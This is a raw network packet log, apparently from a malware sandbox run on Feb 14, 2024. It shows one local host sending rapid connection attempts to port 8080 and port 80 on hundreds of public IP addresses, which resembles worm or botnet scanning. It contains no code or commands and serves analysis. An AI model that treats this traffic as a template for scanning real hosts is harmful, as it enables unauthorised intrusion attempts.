Feb 14, 2024 09:28:48.054614067 CET	6752	8080	192.168.2.15	95.64.71.93
Feb 14, 2024 09:28:48.054614067 CET	6752	8080	192.168.2.15	62.72.0.92
Feb 14, 2024 09:28:48.054622889 CET	6752	8080	192.168.2.15	95.44.64.31
Feb 14, 2024 09:28:48.054627895 CET	6752	8080	192.168.2.15	94.134.175.198
Feb 14, 2024 09:28:48.054631948 CET	6752	8080	192.168.2.15	85.155.247.233
Feb 14, 2024 09:28:48.054631948 CET	6752	8080	192.168.2.15	85.235.170.71
Feb 14, 2024 09:28:48.054636955 CET	6752	8080	192.168.2.15	85.158.195.182
Feb 14, 2024 09:28:48.054645061 CET	6752	8080	192.168.2.15	85.201.184.185
Feb 14, 2024 09:28:48.054646969 CET	6752	8080	192.168.2.15	85.204.79.4
Feb 14, 2024 09:28:48.054666042 CET	6752	8080	192.168.2.15	85.93.75.170
Feb 14, 2024 09:28:48.054672003 CET	6752	8080	192.168.2.15	62.224.240.109
Feb 14, 2024 09:28:48.054672956 CET	6752	8080	192.168.2.15	94.177.183.170
Feb 14, 2024 09:28:48.054675102 CET	6752	8080	192.168.2.15	62.80.85.124
Feb 14, 2024 09:28:48.054680109 CET	6752	8080	192.168.2.15	62.97.16.114
Feb 14, 2024 09:28:48.054682970 CET	6752	8080	192.168.2.15	85.30.74.163
Feb 14, 2024 09:28:48.054682970 CET	6752	8080	192.168.2.15	95.34.120.59
Feb 14, 2024 09:28:48.054682970 CET	6752	8080	192.168.2.15	94.196.139.219
Feb 14, 2024 09:28:48.054682970 CET	6752	8080	192.168.2.15	94.67.250.102
Feb 14, 2024 09:28:48.054687977 CET	6752	8080	192.168.2.15	95.158.149.133
Feb 14, 2024 09:28:48.054698944 CET	6752	8080	192.168.2.15	31.112.12.227
Feb 14, 2024 09:28:48.054701090 CET	6752	8080	192.168.2.15	62.175.12.203
Feb 14, 2024 09:28:48.054701090 CET	6752	8080	192.168.2.15	62.120.21.134
Feb 14, 2024 09:28:48.054702997 CET	6752	8080	192.168.2.15	94.237.77.104
Feb 14, 2024 09:28:48.054704905 CET	6752	8080	192.168.2.15	94.157.150.114
Feb 14, 2024 09:28:48.054711103 CET	6752	8080	192.168.2.15	31.81.39.248
Feb 14, 2024 09:28:48.054722071 CET	6752	8080	192.168.2.15	94.172.158.214
Feb 14, 2024 09:28:48.054724932 CET	6752	8080	192.168.2.15	95.19.37.207
Feb 14, 2024 09:28:48.054729939 CET	6752	8080	192.168.2.15	85.216.119.211
Feb 14, 2024 09:28:48.054734945 CET	6752	8080	192.168.2.15	95.187.218.15
Feb 14, 2024 09:28:48.054737091 CET	6752	8080	192.168.2.15	62.243.237.183
Feb 14, 2024 09:28:48.054737091 CET	6752	8080	192.168.2.15	94.189.131.219
Feb 14, 2024 09:28:48.054738998 CET	6752	8080	192.168.2.15	62.253.179.221
Feb 14, 2024 09:28:48.054748058 CET	6752	8080	192.168.2.15	62.124.105.126
Feb 14, 2024 09:28:48.054754019 CET	6752	8080	192.168.2.15	94.98.255.250
Feb 14, 2024 09:28:48.054755926 CET	6752	8080	192.168.2.15	85.124.226.87
Feb 14, 2024 09:28:48.054759979 CET	6752	8080	192.168.2.15	62.158.94.94
Feb 14, 2024 09:28:48.054773092 CET	6752	8080	192.168.2.15	94.51.212.175
Feb 14, 2024 09:28:48.054774046 CET	6752	8080	192.168.2.15	85.17.204.203
Feb 14, 2024 09:28:48.054788113 CET	6752	8080	192.168.2.15	94.150.82.173
Feb 14, 2024 09:28:48.054788113 CET	6752	8080	192.168.2.15	94.87.56.6
Feb 14, 2024 09:28:48.054801941 CET	6752	8080	192.168.2.15	94.218.65.45
Feb 14, 2024 09:28:48.054801941 CET	6752	8080	192.168.2.15	62.196.173.224
Feb 14, 2024 09:28:48.054801941 CET	6752	8080	192.168.2.15	94.119.243.227
Feb 14, 2024 09:28:48.054801941 CET	6752	8080	192.168.2.15	62.141.140.55
Feb 14, 2024 09:28:48.054817915 CET	6752	8080	192.168.2.15	85.71.229.42
Feb 14, 2024 09:28:48.054826021 CET	6752	8080	192.168.2.15	31.16.175.50
Feb 14, 2024 09:28:48.054827929 CET	6752	8080	192.168.2.15	94.192.236.221
Feb 14, 2024 09:28:48.054831028 CET	6752	8080	192.168.2.15	31.167.181.133
Feb 14, 2024 09:28:48.054856062 CET	6752	8080	192.168.2.15	95.135.139.210
Feb 14, 2024 09:28:48.054872036 CET	6752	8080	192.168.2.15	95.92.138.27
Feb 14, 2024 09:28:48.054874897 CET	6752	8080	192.168.2.15	85.153.156.184
Feb 14, 2024 09:28:48.054874897 CET	6752	8080	192.168.2.15	94.11.247.234
Feb 14, 2024 09:28:48.054883003 CET	6752	8080	192.168.2.15	31.222.62.140
Feb 14, 2024 09:28:48.054883003 CET	6752	8080	192.168.2.15	31.9.115.152
Feb 14, 2024 09:28:48.054883003 CET	6752	8080	192.168.2.15	31.15.74.207
Feb 14, 2024 09:28:48.054884911 CET	6752	8080	192.168.2.15	62.80.101.46
Feb 14, 2024 09:28:48.054888964 CET	6752	8080	192.168.2.15	95.50.169.209
Feb 14, 2024 09:28:48.054893017 CET	6752	8080	192.168.2.15	62.183.85.92
Feb 14, 2024 09:28:48.054913044 CET	6752	8080	192.168.2.15	85.160.112.146
Feb 14, 2024 09:28:48.054913044 CET	6752	8080	192.168.2.15	85.75.121.164
Feb 14, 2024 09:28:48.054927111 CET	6752	8080	192.168.2.15	85.88.122.199
Feb 14, 2024 09:28:48.054927111 CET	6752	8080	192.168.2.15	94.5.137.6
Feb 14, 2024 09:28:48.054933071 CET	6752	8080	192.168.2.15	31.221.214.105
Feb 14, 2024 09:28:48.054938078 CET	6752	8080	192.168.2.15	62.200.26.195
Feb 14, 2024 09:28:48.054946899 CET	6752	8080	192.168.2.15	31.108.145.115
Feb 14, 2024 09:28:48.054946899 CET	6752	8080	192.168.2.15	85.198.249.63
Feb 14, 2024 09:28:48.054949999 CET	6752	8080	192.168.2.15	31.194.138.182
Feb 14, 2024 09:28:48.054968119 CET	6752	8080	192.168.2.15	31.65.113.106
Feb 14, 2024 09:28:48.054968119 CET	6752	8080	192.168.2.15	94.139.202.123
Feb 14, 2024 09:28:48.054972887 CET	6752	8080	192.168.2.15	94.156.242.229
Feb 14, 2024 09:28:48.054982901 CET	6752	8080	192.168.2.15	62.176.233.6
Feb 14, 2024 09:28:48.054986954 CET	6752	8080	192.168.2.15	31.58.246.179
Feb 14, 2024 09:28:48.054986954 CET	6752	8080	192.168.2.15	31.75.234.20
Feb 14, 2024 09:28:48.054989100 CET	6752	8080	192.168.2.15	95.162.181.161
Feb 14, 2024 09:28:48.055005074 CET	6752	8080	192.168.2.15	31.253.67.120
Feb 14, 2024 09:28:48.055005074 CET	6752	8080	192.168.2.15	94.221.74.125
Feb 14, 2024 09:28:48.055011034 CET	6752	8080	192.168.2.15	62.112.138.143
Feb 14, 2024 09:28:48.055022001 CET	6752	8080	192.168.2.15	95.193.110.48
Feb 14, 2024 09:28:48.055022955 CET	6752	8080	192.168.2.15	94.114.10.82
Feb 14, 2024 09:28:48.055022955 CET	6752	8080	192.168.2.15	31.152.1.28
Feb 14, 2024 09:28:48.055022955 CET	6752	8080	192.168.2.15	85.228.149.135
Feb 14, 2024 09:28:48.055031061 CET	6752	8080	192.168.2.15	62.61.191.201
Feb 14, 2024 09:28:48.055031061 CET	6752	8080	192.168.2.15	31.53.255.63
Feb 14, 2024 09:28:48.055042982 CET	6752	8080	192.168.2.15	85.60.161.151
Feb 14, 2024 09:28:48.055044889 CET	6752	8080	192.168.2.15	62.143.23.107
Feb 14, 2024 09:28:48.055053949 CET	6752	8080	192.168.2.15	62.6.38.121
Feb 14, 2024 09:28:48.055059910 CET	6752	8080	192.168.2.15	95.134.78.251
Feb 14, 2024 09:28:48.055063009 CET	6752	8080	192.168.2.15	62.49.76.185
Feb 14, 2024 09:28:48.055068016 CET	6752	8080	192.168.2.15	94.218.153.20
Feb 14, 2024 09:28:48.055074930 CET	6752	8080	192.168.2.15	31.56.26.20
Feb 14, 2024 09:28:48.055078030 CET	6752	8080	192.168.2.15	85.17.166.206
Feb 14, 2024 09:28:48.055079937 CET	6752	8080	192.168.2.15	94.7.205.190
Feb 14, 2024 09:28:48.055079937 CET	6752	8080	192.168.2.15	94.66.229.83
Feb 14, 2024 09:28:48.055080891 CET	6752	8080	192.168.2.15	94.8.79.175
Feb 14, 2024 09:28:48.055098057 CET	6752	8080	192.168.2.15	31.84.76.223
Feb 14, 2024 09:28:48.055102110 CET	6752	8080	192.168.2.15	31.99.153.18
Feb 14, 2024 09:28:48.055102110 CET	6752	8080	192.168.2.15	85.168.141.192
Feb 14, 2024 09:28:48.055102110 CET	6752	8080	192.168.2.15	94.121.217.194
Feb 14, 2024 09:28:48.055104017 CET	6752	8080	192.168.2.15	31.173.50.249
Feb 14, 2024 09:28:48.055104017 CET	6752	8080	192.168.2.15	85.243.254.212
Feb 14, 2024 09:28:48.055104017 CET	6752	8080	192.168.2.15	31.229.67.103
Feb 14, 2024 09:28:48.055104971 CET	6752	8080	192.168.2.15	85.170.253.174
Feb 14, 2024 09:28:48.055121899 CET	6752	8080	192.168.2.15	62.10.92.164
Feb 14, 2024 09:28:48.055125952 CET	6752	8080	192.168.2.15	94.173.42.112
Feb 14, 2024 09:28:48.055134058 CET	6752	8080	192.168.2.15	94.250.184.183
Feb 14, 2024 09:28:48.055135965 CET	6752	8080	192.168.2.15	94.192.62.144
Feb 14, 2024 09:28:48.055141926 CET	6752	8080	192.168.2.15	95.150.229.182
Feb 14, 2024 09:28:48.055141926 CET	6752	8080	192.168.2.15	94.16.150.55
Feb 14, 2024 09:28:48.055147886 CET	6752	8080	192.168.2.15	62.241.227.204
Feb 14, 2024 09:28:48.055150032 CET	6752	8080	192.168.2.15	85.114.4.94
Feb 14, 2024 09:28:48.055161953 CET	6752	8080	192.168.2.15	94.113.14.175
Feb 14, 2024 09:28:48.055166960 CET	6752	8080	192.168.2.15	31.226.43.15
Feb 14, 2024 09:28:48.055166960 CET	6752	8080	192.168.2.15	94.74.87.185
Feb 14, 2024 09:28:48.055166960 CET	6752	8080	192.168.2.15	85.33.128.12
Feb 14, 2024 09:28:48.055176020 CET	6752	8080	192.168.2.15	31.2.249.8
Feb 14, 2024 09:28:48.055176020 CET	6752	8080	192.168.2.15	94.151.68.6
Feb 14, 2024 09:28:48.055176020 CET	6752	8080	192.168.2.15	94.117.86.179
Feb 14, 2024 09:28:48.055192947 CET	6752	8080	192.168.2.15	31.4.221.59
Feb 14, 2024 09:28:48.055192947 CET	6752	8080	192.168.2.15	85.93.234.151
Feb 14, 2024 09:28:48.055197001 CET	6752	8080	192.168.2.15	31.15.153.119
Feb 14, 2024 09:28:48.055197954 CET	6752	8080	192.168.2.15	94.31.95.134
Feb 14, 2024 09:28:48.055208921 CET	6752	8080	192.168.2.15	31.62.80.129
Feb 14, 2024 09:28:48.055208921 CET	6752	8080	192.168.2.15	31.87.254.1
Feb 14, 2024 09:28:48.055211067 CET	6752	8080	192.168.2.15	85.45.78.250
Feb 14, 2024 09:28:48.055223942 CET	6752	8080	192.168.2.15	62.139.136.218
Feb 14, 2024 09:28:48.055227995 CET	6752	8080	192.168.2.15	85.126.210.242
Feb 14, 2024 09:28:48.055234909 CET	6752	8080	192.168.2.15	62.7.144.245
Feb 14, 2024 09:28:48.055236101 CET	6752	8080	192.168.2.15	62.72.39.178
Feb 14, 2024 09:28:48.055242062 CET	6752	8080	192.168.2.15	62.202.204.229
Feb 14, 2024 09:28:48.055254936 CET	6752	8080	192.168.2.15	31.54.52.62
Feb 14, 2024 09:28:48.055254936 CET	6752	8080	192.168.2.15	95.121.72.140
Feb 14, 2024 09:28:48.055263996 CET	6752	8080	192.168.2.15	94.224.154.107
Feb 14, 2024 09:28:48.055277109 CET	6752	8080	192.168.2.15	62.12.69.25
Feb 14, 2024 09:28:48.055283070 CET	6752	8080	192.168.2.15	62.253.57.87
Feb 14, 2024 09:28:48.055290937 CET	6752	8080	192.168.2.15	95.158.155.229
Feb 14, 2024 09:28:48.055290937 CET	6752	8080	192.168.2.15	31.157.22.216
Feb 14, 2024 09:28:48.055310965 CET	6752	8080	192.168.2.15	95.137.132.156
Feb 14, 2024 09:28:48.055315018 CET	6752	8080	192.168.2.15	62.194.117.39
Feb 14, 2024 09:28:48.055316925 CET	6752	8080	192.168.2.15	85.151.67.146
Feb 14, 2024 09:28:48.055320024 CET	6752	8080	192.168.2.15	31.21.202.182
Feb 14, 2024 09:28:48.055320024 CET	6752	8080	192.168.2.15	62.63.245.135
Feb 14, 2024 09:28:48.055320024 CET	6752	8080	192.168.2.15	31.17.82.85
Feb 14, 2024 09:28:48.055321932 CET	6752	8080	192.168.2.15	31.202.11.101
Feb 14, 2024 09:28:48.055321932 CET	6752	8080	192.168.2.15	62.33.233.206
Feb 14, 2024 09:28:48.055324078 CET	6752	8080	192.168.2.15	94.118.23.204
Feb 14, 2024 09:28:48.055335999 CET	6752	8080	192.168.2.15	62.56.168.197
Feb 14, 2024 09:28:48.055341005 CET	6752	8080	192.168.2.15	31.218.31.245
Feb 14, 2024 09:28:48.055341005 CET	6752	8080	192.168.2.15	31.73.64.58
Feb 14, 2024 09:28:48.055356026 CET	6752	8080	192.168.2.15	62.198.20.170
Feb 14, 2024 09:28:48.055356026 CET	6752	8080	192.168.2.15	62.167.15.245
Feb 14, 2024 09:28:48.055360079 CET	6752	8080	192.168.2.15	31.34.42.66
Feb 14, 2024 09:28:48.055363894 CET	6752	8080	192.168.2.15	62.63.7.255
Feb 14, 2024 09:28:48.055365086 CET	6752	8080	192.168.2.15	85.39.24.114
Feb 14, 2024 09:28:48.055365086 CET	6752	8080	192.168.2.15	31.201.134.31
Feb 14, 2024 09:28:48.055366039 CET	6752	8080	192.168.2.15	95.199.245.209
Feb 14, 2024 09:28:48.055373907 CET	6752	8080	192.168.2.15	94.145.15.164
Feb 14, 2024 09:28:48.055387974 CET	6752	8080	192.168.2.15	95.154.22.255
Feb 14, 2024 09:28:48.055394888 CET	6752	8080	192.168.2.15	62.242.202.230
Feb 14, 2024 09:28:48.055397987 CET	6752	8080	192.168.2.15	95.75.26.210
Feb 14, 2024 09:28:48.055402994 CET	6752	8080	192.168.2.15	95.234.132.195
Feb 14, 2024 09:28:48.055403948 CET	6752	8080	192.168.2.15	62.26.219.212
Feb 14, 2024 09:28:48.055404902 CET	6752	8080	192.168.2.15	62.90.251.184
Feb 14, 2024 09:28:48.055407047 CET	6752	8080	192.168.2.15	85.36.118.62
Feb 14, 2024 09:28:48.055411100 CET	6752	8080	192.168.2.15	85.100.123.100
Feb 14, 2024 09:28:48.055414915 CET	6752	8080	192.168.2.15	31.149.173.232
Feb 14, 2024 09:28:48.055424929 CET	6752	8080	192.168.2.15	31.148.67.253
Feb 14, 2024 09:28:48.055435896 CET	6752	8080	192.168.2.15	62.170.104.158
Feb 14, 2024 09:28:48.055442095 CET	6752	8080	192.168.2.15	94.142.184.57
Feb 14, 2024 09:28:48.055453062 CET	6752	8080	192.168.2.15	31.121.17.216
Feb 14, 2024 09:28:48.055454016 CET	6752	8080	192.168.2.15	62.112.183.100
Feb 14, 2024 09:28:48.055458069 CET	6752	8080	192.168.2.15	94.44.172.33
Feb 14, 2024 09:28:48.055469990 CET	6752	8080	192.168.2.15	31.176.63.11
Feb 14, 2024 09:28:48.055474043 CET	6752	8080	192.168.2.15	94.168.30.109
Feb 14, 2024 09:28:48.055476904 CET	6752	8080	192.168.2.15	85.15.227.121
Feb 14, 2024 09:28:48.055478096 CET	6752	8080	192.168.2.15	85.227.211.212
Feb 14, 2024 09:28:48.055479050 CET	6752	8080	192.168.2.15	31.7.91.93
Feb 14, 2024 09:28:48.055497885 CET	6752	8080	192.168.2.15	85.184.69.242
Feb 14, 2024 09:28:48.055502892 CET	6752	8080	192.168.2.15	95.18.188.230
Feb 14, 2024 09:28:48.055502892 CET	6752	8080	192.168.2.15	31.114.249.93
Feb 14, 2024 09:28:48.055502892 CET	6752	8080	192.168.2.15	62.75.148.76
Feb 14, 2024 09:28:48.055502892 CET	6752	8080	192.168.2.15	85.221.64.187
Feb 14, 2024 09:28:48.055506945 CET	6752	8080	192.168.2.15	94.69.88.93
Feb 14, 2024 09:28:48.055516958 CET	6752	8080	192.168.2.15	62.254.174.56
Feb 14, 2024 09:28:48.055532932 CET	6752	8080	192.168.2.15	95.78.244.97
Feb 14, 2024 09:28:48.055532932 CET	6752	8080	192.168.2.15	85.184.103.198
Feb 14, 2024 09:28:48.055541992 CET	6752	8080	192.168.2.15	62.106.146.23
Feb 14, 2024 09:28:48.055552959 CET	6752	8080	192.168.2.15	95.193.225.126
Feb 14, 2024 09:28:48.055552959 CET	6752	8080	192.168.2.15	31.1.201.42
Feb 14, 2024 09:28:48.055568933 CET	6752	8080	192.168.2.15	85.169.232.167
Feb 14, 2024 09:28:48.055572033 CET	6752	8080	192.168.2.15	62.27.24.42
Feb 14, 2024 09:28:48.055577040 CET	6752	8080	192.168.2.15	95.96.105.161
Feb 14, 2024 09:28:48.055577040 CET	6752	8080	192.168.2.15	94.210.62.239
Feb 14, 2024 09:28:48.055584908 CET	6752	8080	192.168.2.15	85.226.0.3
Feb 14, 2024 09:28:48.055592060 CET	6752	8080	192.168.2.15	31.146.175.36
Feb 14, 2024 09:28:48.055594921 CET	6752	8080	192.168.2.15	94.93.194.93
Feb 14, 2024 09:28:48.055600882 CET	6752	8080	192.168.2.15	95.12.195.151
Feb 14, 2024 09:28:48.055612087 CET	6752	8080	192.168.2.15	62.243.55.147
Feb 14, 2024 09:28:48.055614948 CET	6752	8080	192.168.2.15	95.85.82.248
Feb 14, 2024 09:28:48.055622101 CET	6752	8080	192.168.2.15	85.1.216.204
Feb 14, 2024 09:28:48.055624008 CET	6752	8080	192.168.2.15	94.226.101.121
Feb 14, 2024 09:28:48.055633068 CET	6752	8080	192.168.2.15	94.145.225.95
Feb 14, 2024 09:28:48.055635929 CET	6752	8080	192.168.2.15	85.7.223.239
Feb 14, 2024 09:28:48.055635929 CET	6752	8080	192.168.2.15	94.238.189.83
Feb 14, 2024 09:28:48.055643082 CET	6752	8080	192.168.2.15	31.184.34.130
Feb 14, 2024 09:28:48.055655003 CET	6752	8080	192.168.2.15	62.74.175.149
Feb 14, 2024 09:28:48.055655956 CET	6752	8080	192.168.2.15	95.116.167.29
Feb 14, 2024 09:28:48.055666924 CET	6752	8080	192.168.2.15	85.7.36.187
Feb 14, 2024 09:28:48.055668116 CET	6752	8080	192.168.2.15	85.112.128.189
Feb 14, 2024 09:28:48.055669069 CET	6752	8080	192.168.2.15	62.74.143.64
Feb 14, 2024 09:28:48.055674076 CET	6752	8080	192.168.2.15	31.86.75.25
Feb 14, 2024 09:28:48.055679083 CET	6752	8080	192.168.2.15	31.94.5.78
Feb 14, 2024 09:28:48.055681944 CET	6752	8080	192.168.2.15	62.18.219.214
Feb 14, 2024 09:28:48.055685997 CET	6752	8080	192.168.2.15	94.119.251.254
Feb 14, 2024 09:28:48.055685997 CET	6752	8080	192.168.2.15	85.88.86.217
Feb 14, 2024 09:28:48.055689096 CET	6752	8080	192.168.2.15	94.152.103.26
Feb 14, 2024 09:28:48.055705070 CET	6752	8080	192.168.2.15	95.136.17.175
Feb 14, 2024 09:28:48.055706978 CET	6752	8080	192.168.2.15	31.226.75.48
Feb 14, 2024 09:28:48.055706978 CET	6752	8080	192.168.2.15	95.66.3.21
Feb 14, 2024 09:28:48.055708885 CET	6752	8080	192.168.2.15	94.0.199.46
Feb 14, 2024 09:28:48.055716991 CET	6752	8080	192.168.2.15	95.113.250.154
Feb 14, 2024 09:28:48.055728912 CET	6752	8080	192.168.2.15	62.181.10.100
Feb 14, 2024 09:28:48.055733919 CET	6752	8080	192.168.2.15	62.34.164.186
Feb 14, 2024 09:28:48.055747986 CET	6752	8080	192.168.2.15	62.164.103.59
Feb 14, 2024 09:28:48.055748940 CET	6752	8080	192.168.2.15	94.236.171.22
Feb 14, 2024 09:28:48.055751085 CET	6752	8080	192.168.2.15	94.211.133.115
Feb 14, 2024 09:28:48.055758953 CET	6752	8080	192.168.2.15	95.70.194.153
Feb 14, 2024 09:28:48.055766106 CET	6752	8080	192.168.2.15	95.165.205.89
Feb 14, 2024 09:28:48.055773973 CET	6752	8080	192.168.2.15	31.172.21.175
Feb 14, 2024 09:28:48.055775881 CET	6752	8080	192.168.2.15	62.69.17.198
Feb 14, 2024 09:28:48.055775881 CET	6752	8080	192.168.2.15	85.111.242.52
Feb 14, 2024 09:28:48.055785894 CET	6752	8080	192.168.2.15	95.234.25.54
Feb 14, 2024 09:28:48.055799961 CET	6752	8080	192.168.2.15	85.43.91.81
Feb 14, 2024 09:28:48.055800915 CET	6752	8080	192.168.2.15	94.70.176.4
Feb 14, 2024 09:28:48.055813074 CET	6752	8080	192.168.2.15	95.238.208.129
Feb 14, 2024 09:28:48.055813074 CET	6752	8080	192.168.2.15	94.93.158.238
Feb 14, 2024 09:28:48.055813074 CET	6752	8080	192.168.2.15	31.146.57.254
Feb 14, 2024 09:28:48.055824995 CET	6752	8080	192.168.2.15	62.105.68.13
Feb 14, 2024 09:28:48.055826902 CET	6752	8080	192.168.2.15	62.224.120.169
Feb 14, 2024 09:28:48.055831909 CET	6752	8080	192.168.2.15	31.178.227.13
Feb 14, 2024 09:28:48.055833101 CET	6752	8080	192.168.2.15	85.12.84.204
Feb 14, 2024 09:28:48.055839062 CET	6752	8080	192.168.2.15	62.202.29.253
Feb 14, 2024 09:28:48.055841923 CET	6752	8080	192.168.2.15	95.18.117.48
Feb 14, 2024 09:28:48.055841923 CET	6752	8080	192.168.2.15	85.200.185.81
Feb 14, 2024 09:28:48.055850029 CET	6752	8080	192.168.2.15	94.99.116.64
Feb 14, 2024 09:28:48.055854082 CET	6752	8080	192.168.2.15	85.169.19.60
Feb 14, 2024 09:28:48.055860996 CET	6752	8080	192.168.2.15	94.152.86.248
Feb 14, 2024 09:28:48.055860996 CET	6752	8080	192.168.2.15	95.213.135.230
Feb 14, 2024 09:28:48.055872917 CET	6752	8080	192.168.2.15	95.249.251.136
Feb 14, 2024 09:28:48.055880070 CET	6752	8080	192.168.2.15	62.39.249.84
Feb 14, 2024 09:28:48.055883884 CET	6752	8080	192.168.2.15	94.32.32.119
Feb 14, 2024 09:28:48.055890083 CET	6752	8080	192.168.2.15	31.1.87.91
Feb 14, 2024 09:28:48.055890083 CET	6752	8080	192.168.2.15	31.238.55.43
Feb 14, 2024 09:28:48.055893898 CET	6752	8080	192.168.2.15	95.168.74.111
Feb 14, 2024 09:28:48.055908918 CET	6752	8080	192.168.2.15	95.132.218.238
Feb 14, 2024 09:28:48.055911064 CET	6752	8080	192.168.2.15	95.58.131.112
Feb 14, 2024 09:28:48.055917978 CET	6752	8080	192.168.2.15	85.8.188.195
Feb 14, 2024 09:28:48.055917978 CET	6752	8080	192.168.2.15	62.93.114.41
Feb 14, 2024 09:28:48.055931091 CET	6752	8080	192.168.2.15	95.186.70.0
Feb 14, 2024 09:28:48.055932999 CET	6752	8080	192.168.2.15	95.101.207.175
Feb 14, 2024 09:28:48.055932999 CET	6752	8080	192.168.2.15	85.16.15.111
Feb 14, 2024 09:28:48.055946112 CET	6752	8080	192.168.2.15	85.224.117.236
Feb 14, 2024 09:28:48.055953026 CET	6752	8080	192.168.2.15	62.7.133.227
Feb 14, 2024 09:28:48.055953026 CET	6752	8080	192.168.2.15	85.250.213.162
Feb 14, 2024 09:28:48.055970907 CET	6752	8080	192.168.2.15	95.112.93.140
Feb 14, 2024 09:28:48.055970907 CET	6752	8080	192.168.2.15	85.71.39.231
Feb 14, 2024 09:28:48.055972099 CET	6752	8080	192.168.2.15	85.108.210.105
Feb 14, 2024 09:28:48.055984020 CET	6752	8080	192.168.2.15	85.216.15.175
Feb 14, 2024 09:28:48.055988073 CET	6752	8080	192.168.2.15	95.15.129.58
Feb 14, 2024 09:28:48.055991888 CET	6752	8080	192.168.2.15	31.22.103.106
Feb 14, 2024 09:28:48.055991888 CET	6752	8080	192.168.2.15	31.100.192.101
Feb 14, 2024 09:28:48.056009054 CET	6752	8080	192.168.2.15	31.252.23.123
Feb 14, 2024 09:28:48.056009054 CET	6752	8080	192.168.2.15	62.168.78.47
Feb 14, 2024 09:28:48.056010962 CET	6752	8080	192.168.2.15	85.130.195.36
Feb 14, 2024 09:28:48.056020021 CET	6752	8080	192.168.2.15	85.1.206.144
Feb 14, 2024 09:28:48.056032896 CET	6752	8080	192.168.2.15	31.238.145.205
Feb 14, 2024 09:28:48.056041002 CET	6752	8080	192.168.2.15	62.113.165.199
Feb 14, 2024 09:28:48.056044102 CET	6752	8080	192.168.2.15	31.201.170.128
Feb 14, 2024 09:28:48.056087971 CET	35590	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.056107998 CET	35590	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.056164980 CET	35596	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.056785107 CET	8080	35576	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.056837082 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.072758913 CET	80	52506	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:48.077214003 CET	8080	35576	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.077229977 CET	8080	35576	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.086218119 CET	80	52506	95.47.167.65	192.168.2.15
Feb 14, 2024 09:28:48.086286068 CET	52506	80	192.168.2.15	95.47.167.65
Feb 14, 2024 09:28:48.087435961 CET	8080	35592	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.087534904 CET	35592	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.087565899 CET	35592	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.103914022 CET	8080	35576	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.103964090 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.118220091 CET	80	52642	95.215.242.21	192.168.2.15
Feb 14, 2024 09:28:48.118473053 CET	52642	80	192.168.2.15	95.215.242.21
Feb 14, 2024 09:28:48.130448103 CET	80	54290	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:48.143660069 CET	8080	58934	94.122.18.192	192.168.2.15
Feb 14, 2024 09:28:48.143721104 CET	58934	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:48.143763065 CET	58934	8080	192.168.2.15	94.122.18.192
Feb 14, 2024 09:28:48.144081116 CET	8080	55712	94.123.65.84	192.168.2.15
Feb 14, 2024 09:28:48.145584106 CET	8080	35576	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.145638943 CET	35576	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.147320032 CET	8080	58922	94.122.18.192	192.168.2.15
Feb 14, 2024 09:28:48.162884951 CET	80	57552	95.209.129.238	192.168.2.15
Feb 14, 2024 09:28:48.162950993 CET	57552	80	192.168.2.15	95.209.129.238
Feb 14, 2024 09:28:48.171768904 CET	80	54290	95.86.78.146	192.168.2.15
Feb 14, 2024 09:28:48.171822071 CET	54290	80	192.168.2.15	95.86.78.146
Feb 14, 2024 09:28:48.220530033 CET	8080	6752	95.111.213.230	192.168.2.15
Feb 14, 2024 09:28:48.250511885 CET	8080	6752	95.152.230.214	192.168.2.15
Feb 14, 2024 09:28:48.261221886 CET	8080	6752	85.8.188.195	192.168.2.15
Feb 14, 2024 09:28:48.261238098 CET	8080	6752	31.220.205.195	192.168.2.15
Feb 14, 2024 09:28:48.266602993 CET	8080	6752	85.252.17.117	192.168.2.15
Feb 14, 2024 09:28:48.269639015 CET	8080	6752	85.24.150.148	192.168.2.15
Feb 14, 2024 09:28:48.270039082 CET	8080	6752	95.111.250.56	192.168.2.15
Feb 14, 2024 09:28:48.270454884 CET	8080	6752	94.158.191.102	192.168.2.15
Feb 14, 2024 09:28:48.275357962 CET	8080	6752	95.96.165.1	192.168.2.15
Feb 14, 2024 09:28:48.276767969 CET	8080	6752	62.44.112.6	192.168.2.15
Feb 14, 2024 09:28:48.280327082 CET	80	7840	112.173.109.96	192.168.2.15
Feb 14, 2024 09:28:48.282710075 CET	8080	6752	95.224.169.133	192.168.2.15
Feb 14, 2024 09:28:48.283776999 CET	8080	6752	95.111.70.231	192.168.2.15
Feb 14, 2024 09:28:48.284876108 CET	8080	6752	95.62.44.57	192.168.2.15
Feb 14, 2024 09:28:48.285144091 CET	80	7840	112.169.120.242	192.168.2.15
Feb 14, 2024 09:28:48.285233974 CET	7840	80	192.168.2.15	112.169.120.242
Feb 14, 2024 09:28:48.287405014 CET	8080	6752	95.247.246.112	192.168.2.15
Feb 14, 2024 09:28:48.287488937 CET	8080	6752	95.60.85.105	192.168.2.15
Feb 14, 2024 09:28:48.287538052 CET	8080	35592	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.287585020 CET	35592	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.288019896 CET	80	7840	112.166.212.55	192.168.2.15
Feb 14, 2024 09:28:48.288063049 CET	7840	80	192.168.2.15	112.166.212.55
Feb 14, 2024 09:28:48.288661957 CET	8080	35596	94.101.49.114	192.168.2.15
Feb 14, 2024 09:28:48.288717985 CET	35596	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.288772106 CET	35596	8080	192.168.2.15	94.101.49.114
Feb 14, 2024 09:28:48.289309978 CET	8080	6752	85.93.234.151	192.168.2.15
Feb 14, 2024 09:28:48.289448977 CET	6752	8080	192.168.2.15	85.93.234.151
